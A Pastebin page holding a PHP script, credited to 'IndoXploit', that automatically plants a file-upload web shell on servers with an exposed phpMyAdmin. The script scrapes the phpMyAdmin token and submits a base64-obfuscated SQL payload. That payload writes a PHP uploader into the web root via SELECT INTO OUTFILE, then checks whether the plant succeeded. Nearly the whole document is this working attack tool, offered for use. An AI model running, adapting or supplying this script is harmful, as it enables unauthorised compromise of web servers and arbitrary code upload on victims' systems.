Advertisement
Tu5b0l3d

Auto upload uploader in phpmyadmin

Nov 11th, 2015
1,732
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.75 KB | None | 0 0
  1. <?php
  2. //Tu5b0l3d
  3. //Auto upload uploader in phpmyadmin
  4. cover();
  5. $site = "Ini_Target";
  6. $sql = "phpmyadmin/import.php";
  7. $sql2 = "phpmyadmin/server_sql.php";
  8. $file = "n.php";
  9.  
  10. function anuu($url, $dir){
  11.  $ch1 = curl_init("$url/$dir");
  12. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
  13. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
  14. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  15. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
  16. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
  17. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
  18. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
  19. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
  20. $data = curl_exec ($ch1);
  21. return $data;
  22. }
  23.  
  24. function ambilKata($param, $kata1, $kata2){
  25.     if(strpos($param, $kata1) === FALSE) return FALSE;
  26.     if(strpos($param, $kata2) === FALSE) return FALSE;
  27.     $start = strpos($param, $kata1) + strlen($kata1);
  28.     $end = strpos($param, $kata2, $start);
  29.     $return = substr($param, $start, $end - $start);
  30.     return $return;
  31. }
  32.  
  33. function cover(){
  34.     echo "\n\n\t############# IndoXploit #############\n";
  35.     echo "\t#########  Thx To: HNc, IBT  #########\n\n";
  36. }
  37.  
  38.  
  39. function upload22($urlq, $path, $toket, $shell){
  40.         $post = array(
  41.                     "is_js_confirmed" => "0",
  42.                     "token" => "$toket",
  43.                     "pos" => "0",
  44.                     "goto" => "server_sql.php",
  45.                     "zero_rows" => "Your SQL query has been executed successfully",
  46.                     "sql_query" => "$shell",
  47.                     "bkm_label" => "",
  48.                     "bkm_all_users" => "",
  49.                     "bkm_replace" => "true",
  50.                     "sql_delimiter" => ";",
  51.                     "show_query" => "1",
  52.                     "SQL" => "Go",
  53.                     );
  54. $ch = curl_init ("$urlq/$path");
  55. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  56. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  57. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  58. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  59. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  60. curl_setopt ($ch, CURLOPT_POST, 1);
  61. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  62. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  63. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  64. $data6 = curl_exec ($ch);
  65. return $data6;
  66. }
  67.  
  68.  
  69. $toket = anuu($site, $sql2);
  70. $toket_asli = ambilkata($toket,"name=\"token\" value=\"","\" />");
  71.  
  72.  
  73. $shell = base64_decode("dXNlIG15c3FsOw0KRFJPUCBUQUJMRSBJRiBFWElTVFMgYHRlbXB0YWJgOw0KQ1JFQVRFIFRBQkxFIHRlbXB0YWIgKGNvZGV0YWIgdGV4dCk7DQpJTlNFUlQgSU5UTyB0ZW1wdGFiIChjb2RldGFiKSBWQUxVRVMgKA0KJzx0aXRsZT5VcGxvYWQgRmlsZTwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KPCEtLQ0KYm9keSx0ZCx0aCB7DQpjb2xvcjogIzBGMDsNCn0NCmJvZHkgew0KYmFja2dyb3VuZC1jb2xvcjogIzk5OTsNCn0NCi0tPg0KPC9zdHlsZT48cD5nYW50ZW5nDQo8Zm9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiA+DQo8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgLz4NCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJVcGxvYWQiIC8+DQo8L2Zvcm0+DQo8cD4NCjxzdHJvbmc+DQo8P3BocA0KaWYgKCRfRklMRVNbImZpbGUiXSAhPSAiIikgew0KY29weSgkX0ZJTEVTWyJmaWxlIl1bInRtcF9uYW1lIl0sICRfRklMRVNbImZpbGUiXVsibmFtZSJdKSBvciBkaWUgKCJQcm9zZXMgdXBsb2FkIEdhZ2FsOiAiKTsNCn1lbHNlIHsNCmRpZSgiU2lsYWhrYW4gcGlsaWggZmlsZSIpOw0KfQ0KPz4NCkZpbGUgYmVyaGFzaWwgZGl1cGxvYWQ6PGJyIC8+DQpLZXRlcmFuZ2FuIEZpbGU6PGJyIC8+DQpOYW1hIEZpbGU6IDw/cGhwIGVjaG8gJF9GSUxFU1siZmlsZSJdWyJuYW1lIl07ID8+PGJyIC8+DQpVa3VyYW4gRmlsZTogPD9waHAgZWNobyAkX0ZJTEVTWyJmaWxlIl1bInNpemUiXTs/PiBCeXRlcyA8YnIgLz4NCkplbmlzIEZpbGU6IDw/cGhwIGVjaG8gJF9GSUxFU1siZmlsZSJdWyJ0eXBlIl07ID8+PC9zdHJvbmc+PC9wPg0KDQonDQopOw0KU0VMRUNUICogSU5UTyBPVVRGSUxFICdDOi94YW1wcC9odGRvY3Mvbi5waHAnIGZyb20gdGVtcHRhYjsNCkRST1AgVEFCTEUgdGVtcHRhYjsNCkZMVVNIIExPR1M7DQo=");
  74. $upload = upload22($site, $sql, $toket_asli, $shell);
  75. $files = anuu($site, $file);
  76. if(preg_match("#ganteng#i",$files)){
  77.     echo "# Berhasil Nanem Uploader\n$site/$file\n\n";
  78. }
  79. else{
  80.     echo "# Gagal~\n";
  81. }
  82.  
  83.  
  84.  
  85. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement